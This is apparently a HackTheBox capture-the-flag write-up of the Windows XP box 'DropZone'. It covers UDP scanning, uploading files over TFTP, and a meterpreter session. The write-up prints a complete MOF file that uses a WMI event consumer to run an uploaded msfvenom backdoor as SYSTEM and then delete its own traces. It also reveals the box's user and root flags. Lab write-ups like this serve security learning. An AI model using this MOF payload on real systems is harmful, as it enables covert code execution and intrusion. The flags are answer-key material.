HackTheBox Writeup — DropZone

Hello Guys , I am Faisal Husaini. My username on HTB is “smoke” .

This was a pretty tricky box and I learn about many stuffs after solving this box.

The IP for this machine is and also this is a Windows box

Doing nmap scan with the command “nmap -sC -sV -oA nmap -Pn”

We get all ports to be said as filtered. Also I tried every method on TCP , but no luck , so now lets scan for UDP Ports

After scanning for UDP ports , we come to know that only 1 port is open and that is Port 69 running tftp service, lets scan it for versions and all

Nothing much interesting

Now lets run the TFTP brute module from msfconsole and see the results


We set the RHOSTS to and the RPORT was default to 69 , but we see that we don't get anything from here

We try to connect to the TFTP by the command “tftp”

TFTP Connection

So we can see that get and put our files in the tftp server , so we can create our exe backdoor from msfvenom , but we cant execute it.

After asking for hint from my friend , I came to know that I can upload mof files , so that it will automatically let my .exe backdoor execute.

So I create a mof file so that it can automatically execute my .exe backdoor

#pragma namespace(“\\\\.\\root\\cimv2”)
class MyClass49560
[key] string Name;
class ActiveScriptEventConsumer : __EventConsumer
[key] string Name;
[not_null] string ScriptingEngine;
string ScriptFileName;
[template] string ScriptText;
uint32 KillTimeout;
instance of __Win32Provider as $P
Name = “ActiveScriptEventConsumer”;
CLSID = “{266c72e7–62e8–11d1-ad89–00c04fd8fdff}”;
PerUserInitialization = TRUE;
instance of __EventConsumerProviderRegistration
Provider = $P;
ConsumerClassNames = {“ActiveScriptEventConsumer”};
Instance of ActiveScriptEventConsumer as $cons
Name = “ASEC”;
ScriptingEngine = “JScript”;
ScriptText = “\ntry {var s = new ActiveXObject(\”Wscript.Shell\”);\ns.Run(\”test.exe\”);} catch (err) {};\nsv = GetObject(\”winmgmts:root\\\\cimv2\”);try {sv.Delete(\”MyClass49560\”);} catch (err) {};try {sv.Delete(\”__EventFilter.Name=’instfilt’\”);} catch (err) {};try {sv.Delete(\”ActiveScriptEventConsumer.Name=’ASEC’\”);} catch(err) {};”;

Instance of ActiveScriptEventConsumer as $cons2
Name = “qndASEC”;
ScriptingEngine = “JScript”;
ScriptText = “\nvar objfs = new ActiveXObject(\”Scripting.FileSystemObject\”);\ntry {var f1 = objfs.GetFile(\”wbem\\\\mof\\\\good\\\\vlakeia.mof\”);\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\”test.exe\”);\nf2.Delete(true);\nvar s = GetObject(\”winmgmts:root\\\\cimv2\”);s.Delete(\”__EventFilter.Name=’qndfilt’\”);s.Delete(\”ActiveScriptEventConsumer.Name=’qndASEC’\”);\n} catch(err) {};”;
instance of __EventFilter as $Filt
Name = “instfilt”;
Query = “SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \”MyClass49560\””;
QueryLanguage = “WQL”;
instance of __EventFilter as $Filt2
Name = “qndfilt”;
Query = “SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \”Win32_Process\” AND TargetInstance.Name = \”test.exe\””;
QueryLanguage = “WQL”;

instance of __FilterToConsumerBinding as $bind
Consumer = $cons;
Filter = $Filt;
instance of __FilterToConsumerBinding as $bind2
Consumer = $cons2;
Filter = $Filt2;
instance of MyClass49560 as $MyClass

Name = “ClassConsumer”;

I will use msfvenom to create my test.exe backdoor in the as usual way


Now we will upload our created files , i.e , mof file and the backdoor .exe file through through the TFTP server

From the link which I referred before , I came to know that I have to upload the mof file in “%SystemRoot%\System32\wbem\mof\” directory and the backdoor file in “%SystemRoot%\System32\” directory , so lets do it

Uploading Files Through TFTP

We uploaded the .exe backdoor using binary mode

Also set up the listener in msfconsole , and wait for response back


We got meterpreter , now lets dig into it

Now lets run the “sysinfo” and “getuid” commands and see the results


We see that the machine is Windows XP and also we have the NT AUTHORITY\SYSTEM , so we can directly get both the flags without any privilege escalation. So lets get it

Now lets get the flags

We now move on to get the user and root flags

2 for the price 1!.txt

We see that a hint is given like ADS , which maybe Alternative Data Streams , so we will download stream.exe and upload in our meterpreter to run it and fetch the file

Here we encounter another challenge

So we upload it the streams.exe file through our meterpreter and run it through the command “streams.exe -s -d flags” , here the flags is the folder name in which the user and root flags were

The Flags

Here in the pic , we can see that we got both user flag and root flag

User Flag → a6a4830ddd27a1bddd59d2aaa80f7940
Root Flag → 3316ffe05fada8f8e651931a5c45edab

This box was hard for me , also this was totally new thing which I saw

File Upload Through TFTP → Full Admin Privileges

Alternative Data Streams → To get both the flags


I didn't had any idea about mof files and all , so I referred to this link → http://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store